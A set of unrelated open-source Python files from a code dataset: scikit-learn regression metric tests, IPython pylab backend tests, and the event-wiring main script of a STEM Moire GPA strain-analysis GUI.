X, self.centroids_, metric=self.metric).argmin(axis=1)]
| bsd-3-clause |
djgagne/scikit-learn | sklearn/metrics/tests/test_regression.py | 272 | 6066 | from __future__ import division, print_function
import numpy as np
from itertools import product
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.metrics import explained_variance_score
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
from sklearn.metrics import median_absolute_error
from sklearn.metrics import r2_score
from sklearn.metrics.regression import _check_reg_targets
def test_regression_metrics(n_samples=50):
y_true = np.arange(n_samples)
y_pred = y_true + 1
assert_almost_equal(mean_squared_error(y_true, y_pred), 1.)
assert_almost_equal(mean_absolute_error(y_true, y_pred), 1.)
assert_almost_equal(median_absolute_error(y_true, y_pred), 1.)
assert_almost_equal(r2_score(y_true, y_pred), 0.995, 2)
assert_almost_equal(explained_variance_score(y_true, y_pred), 1.)
def test_multioutput_regression():
y_true = np.array([[1, 0, 0, 1], [0, 1, 1, 1], [1, 1, 0, 1]])
y_pred = np.array([[0, 0, 0, 1], [1, 0, 1, 1], [0, 0, 0, 1]])
error = mean_squared_error(y_true, y_pred)
assert_almost_equal(error, (1. / 3 + 2. / 3 + 2. / 3) / 4.)
# mean_absolute_error and mean_squared_error are equal because
# it is a binary problem.
error = mean_absolute_error(y_true, y_pred)
assert_almost_equal(error, (1. / 3 + 2. / 3 + 2. / 3) / 4.)
error = r2_score(y_true, y_pred, multioutput='variance_weighted')
assert_almost_equal(error, 1. - 5. / 2)
error = r2_score(y_true, y_pred, multioutput='uniform_average')
assert_almost_equal(error, -.875)
def test_regression_metrics_at_limits():
assert_almost_equal(mean_squared_error([0.], [0.]), 0.00, 2)
assert_almost_equal(mean_absolute_error([0.], [0.]), 0.00, 2)
assert_almost_equal(median_absolute_error([0.], [0.]), 0.00, 2)
assert_almost_equal(explained_variance_score([0.], [0.]), 1.00, 2)
assert_almost_equal(r2_score([0., 1], [0., 1]), 1.00, 2)
def test__check_reg_targets():
# All of length 3
EXAMPLES = [
("continuous", [1, 2, 3], 1),
("continuous", [[1], [2], [3]], 1),
("continuous-multioutput", [[1, 1], [2, 2], [3, 1]], 2),
("continuous-multioutput", [[5, 1], [4, 2], [3, 1]], 2),
("continuous-multioutput", [[1, 3, 4], [2, 2, 2], [3, 1, 1]], 3),
]
for (type1, y1, n_out1), (type2, y2, n_out2) in product(EXAMPLES,
repeat=2):
if type1 == type2 and n_out1 == n_out2:
y_type, y_check1, y_check2, multioutput = _check_reg_targets(
y1, y2, None)
assert_equal(type1, y_type)
if type1 == 'continuous':
assert_array_equal(y_check1, np.reshape(y1, (-1, 1)))
assert_array_equal(y_check2, np.reshape(y2, (-1, 1)))
else:
assert_array_equal(y_check1, y1)
assert_array_equal(y_check2, y2)
else:
assert_raises(ValueError, _check_reg_targets, y1, y2, None)
def test_regression_multioutput_array():
y_true = [[1, 2], [2.5, -1], [4.5, 3], [5, 7]]
y_pred = [[1, 1], [2, -1], [5, 4], [5, 6.5]]
mse = mean_squared_error(y_true, y_pred, multioutput='raw_values')
mae = mean_absolute_error(y_true, y_pred, multioutput='raw_values')
r = r2_score(y_true, y_pred, multioutput='raw_values')
evs = explained_variance_score(y_true, y_pred, multioutput='raw_values')
assert_array_almost_equal(mse, [0.125, 0.5625], decimal=2)
assert_array_almost_equal(mae, [0.25, 0.625], decimal=2)
assert_array_almost_equal(r, [0.95, 0.93], decimal=2)
assert_array_almost_equal(evs, [0.95, 0.93], decimal=2)
# mean_absolute_error and mean_squared_error are equal because
# it is a binary problem.
y_true = [[0, 0]]*4
y_pred = [[1, 1]]*4
mse = mean_squared_error(y_true, y_pred, multioutput='raw_values')
mae = mean_absolute_error(y_true, y_pred, multioutput='raw_values')
r = r2_score(y_true, y_pred, multioutput='raw_values')
assert_array_almost_equal(mse, [1., 1.], decimal=2)
assert_array_almost_equal(mae, [1., 1.], decimal=2)
assert_array_almost_equal(r, [0., 0.], decimal=2)
r = r2_score([[0, -1], [0, 1]], [[2, 2], [1, 1]], multioutput='raw_values')
assert_array_almost_equal(r, [0, -3.5], decimal=2)
assert_equal(np.mean(r), r2_score([[0, -1], [0, 1]], [[2, 2], [1, 1]],
multioutput='uniform_average'))
evs = explained_variance_score([[0, -1], [0, 1]], [[2, 2], [1, 1]],
multioutput='raw_values')
assert_array_almost_equal(evs, [0, -1.25], decimal=2)
# Checking for the condition in which both numerator and denominator is
# zero.
y_true = [[1, 3], [-1, 2]]
y_pred = [[1, 4], [-1, 1]]
r2 = r2_score(y_true, y_pred, multioutput='raw_values')
assert_array_almost_equal(r2, [1., -3.], decimal=2)
assert_equal(np.mean(r2), r2_score(y_true, y_pred,
multioutput='uniform_average'))
evs = explained_variance_score(y_true, y_pred, multioutput='raw_values')
assert_array_almost_equal(evs, [1., -3.], decimal=2)
assert_equal(np.mean(evs), explained_variance_score(y_true, y_pred))
def test_regression_custom_weights():
y_true = [[1, 2], [2.5, -1], [4.5, 3], [5, 7]]
y_pred = [[1, 1], [2, -1], [5, 4], [5, 6.5]]
msew = mean_squared_error(y_true, y_pred, multioutput=[0.4, 0.6])
maew = mean_absolute_error(y_true, y_pred, multioutput=[0.4, 0.6])
rw = r2_score(y_true, y_pred, multioutput=[0.4, 0.6])
evsw = explained_variance_score(y_true, y_pred, multioutput=[0.4, 0.6])
assert_almost_equal(msew, 0.39, decimal=2)
assert_almost_equal(maew, 0.475, decimal=3)
assert_almost_equal(rw, 0.94, decimal=2)
assert_almost_equal(evsw, 0.94, decimal=2)
| bsd-3-clause |
noslenfa/tdjangorest | uw/lib/python2.7/site-packages/IPython/core/tests/test_pylabtools.py | 2 | 4546 | """Tests for pylab tools module.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2011, the IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
# Stdlib imports
# Third-party imports
import matplotlib; matplotlib.use('Agg')
import nose.tools as nt
from matplotlib import pyplot as plt
import numpy as np
# Our own imports
from IPython.core.interactiveshell import InteractiveShell
from IPython.testing import decorators as dec
from .. import pylabtools as pt
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Local utilities
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
@dec.parametric
def test_figure_to_svg():
# simple empty-figure test
fig = plt.figure()
yield nt.assert_equal(pt.print_figure(fig, 'svg'), None)
plt.close('all')
# simple check for at least svg-looking output
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot([1,2,3])
plt.draw()
svg = pt.print_figure(fig, 'svg')[:100].lower()
yield nt.assert_true('doctype svg' in svg)
def test_import_pylab():
ip = get_ipython()
ns = {}
pt.import_pylab(ns, import_all=False)
nt.assert_true('plt' in ns)
nt.assert_equal(ns['np'], np)
class TestPylabSwitch(object):
class Shell(InteractiveShell):
def enable_gui(self, gui):
pass
def setup(self):
import matplotlib
def act_mpl(backend):
matplotlib.rcParams['backend'] = backend
# Save rcParams since they get modified
self._saved_rcParams = matplotlib.rcParams
matplotlib.rcParams = dict(backend='Qt4Agg')
# Mock out functions
self._save_am = pt.activate_matplotlib
pt.activate_matplotlib = act_mpl
self._save_ip = pt.import_pylab
pt.import_pylab = lambda *a,**kw:None
self._save_cis = pt.configure_inline_support
pt.configure_inline_support = lambda *a,**kw:None
def teardown(self):
pt.activate_matplotlib = self._save_am
pt.import_pylab = self._save_ip
pt.configure_inline_support = self._save_cis
import matplotlib
matplotlib.rcParams = self._saved_rcParams
def test_qt(self):
s = self.Shell()
gui, backend = s.enable_matplotlib(None)
nt.assert_equal(gui, 'qt')
nt.assert_equal(s.pylab_gui_select, 'qt')
gui, backend = s.enable_matplotlib('inline')
nt.assert_equal(gui, 'inline')
nt.assert_equal(s.pylab_gui_select, 'qt')
gui, backend = s.enable_matplotlib('qt')
nt.assert_equal(gui, 'qt')
nt.assert_equal(s.pylab_gui_select, 'qt')
gui, backend = s.enable_matplotlib('inline')
nt.assert_equal(gui, 'inline')
nt.assert_equal(s.pylab_gui_select, 'qt')
gui, backend = s.enable_matplotlib()
nt.assert_equal(gui, 'qt')
nt.assert_equal(s.pylab_gui_select, 'qt')
def test_inline(self):
s = self.Shell()
gui, backend = s.enable_matplotlib('inline')
nt.assert_equal(gui, 'inline')
nt.assert_equal(s.pylab_gui_select, None)
gui, backend = s.enable_matplotlib('inline')
nt.assert_equal(gui, 'inline')
nt.assert_equal(s.pylab_gui_select, None)
gui, backend = s.enable_matplotlib('qt')
nt.assert_equal(gui, 'qt')
nt.assert_equal(s.pylab_gui_select, 'qt')
def test_qt_gtk(self):
s = self.Shell()
gui, backend = s.enable_matplotlib('qt')
nt.assert_equal(gui, 'qt')
nt.assert_equal(s.pylab_gui_select, 'qt')
gui, backend = s.enable_matplotlib('gtk')
nt.assert_equal(gui, 'qt')
nt.assert_equal(s.pylab_gui_select, 'qt')
| apache-2.0 |
slimpotatoes/STEM_Moire_GPA | src/main.py | 1 | 4692 | # ############################# #
# #
# STEM Moire GPA Software #
# #
# ############################# #
#
# #####################################################################################
#
# Python script calculating the 2D relative strain maps from a STEM Moire hologram.
# Alexandre POFELSKI <pofelska@mcmaster.ca>
# https://github.com/slimpotatoes/STEM_Moire_GPA
# 18/06/2019
#
# ###########################################
# STEM Moire GPA control Module
import matplotlib.pyplot as plt
import gui as gui
import data as data
import userinput as userinput
import smhsimulation as smhsimu
import gpa as gpa
import unstrainref as uref
import conversion as conversion
import straincalc as strain
import rotatecalc as rotate
def main():
"""Connection of the different events (button clicked by user) with the process steps of
STEM Moire GPA processing"""
def flow_input(event):
"""Input Process
1. Call the GUI to create an open file dialog for the user to input files.
2. Verify and import files in smgdata.
3. Display the SMH and ICref images to the user."""
if not event.inaxes == smggui.event_input.ax:
raise Exception('Improper input axis')
file_path_smh, file_path_ic = smggui.open_files()
userinput.load_files(file_path_smh, file_path_ic, smgdata)
smggui.guismhexp(smgdata)
def flow_smhsim(event):
"""Simulation of the STEM Moire hologram Process
1. Call smh_sim function in smhsimulation module to simulate the STEM Moire hologram from ICref and store
the results in smgdata.
2. Display the results of the simulation to the user using guismhsim window."""
if not event.inaxes == smggui.event_smhsim.ax:
raise Exception('Improper shmsim axis')
smhsimu.smh_sim(smgdata)
smggui.guismhsim(smgdata)
def flow_gpa(event):
"""Geometrical Phase Analysis Process
1. Collect the mask selected by the user on the guismhsim window.
2. Perform the GPA calculation on the selected mask and store the results in smgdata.
3. Display the GPA result (phase image) to the user using guiphase window."""
if not event.inaxes == smggui.event_gpa.ax:
raise Exception('Improper gpa axis')
mask_selected = smggui.mask_selection()
gpa.gpa(mask_selected, smgdata)
smggui.guiphase(mask_selected, smgdata)
def flow_ref(event):
"""Unstrained reference definition Process. On the two phase images calculated by GPA,
1. Call the update_zerostrain function in unstrainref module to update the unstrain reference on the
phase image and store the results in smgdata.
2. Display the updated phase image with the new unstrained reference on the guiphase window."""
if not event.inaxes == smggui.event_ref.ax:
raise Exception('Improper ref axis')
for mask_id in ['Mask1', 'Mask2']:
uref.update_zerostrain(mask_id, smgdata)
smggui.update_phase(mask_id, smgdata)
def flow_convert(event):
"""Moire to crystal data conversion Process. Call the conversion function in the conversion module for both
masks."""
if not event.inaxes == smggui.event_convert.ax:
raise Exception('Improper convert axis')
print(smggui.h_1, smggui.h_2, smggui.v_1, smggui.v_2)
conversion.conversion('Mask1', smggui.h_1, smggui.v_1, smgdata)
conversion.conversion('Mask2', smggui.h_2, smggui.v_2, smgdata)
def flow_strain(event):
"""Strain tensor calculation from two non collinear crystalline wave vector Process"""
if not event.inaxes == smggui.event_strain.ax:
raise Exception('Improper strain axis')
strain.strain_calculation('Mask1', 'Mask2', smgdata)
rotate.rotate_tensor(smgdata, smggui)
smggui.guistrain(smgdata)
"""Creation of the GUI and the Data object"""
smgdata = data.SMGData()
smggui = gui.SMGGUI(smgdata)
"""Call of the GUI module functions to pop up the initial windows for the user"""
smggui.guiconv()
smggui.guiflow()
"""Connection of the event "button clicked by the user" to a function"""
smggui.event_input.on_clicked(flow_input)
smggui.event_smhsim.on_clicked(flow_smhsim)
smggui.event_gpa.on_clicked(flow_gpa)
smggui.event_ref.on_clicked(flow_ref)
smggui.event_convert.on_clicked(flow_convert)
smggui.event_strain.on_clicked(flow_strain)
plt.show()
if __name__ == "__main__":
main()
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.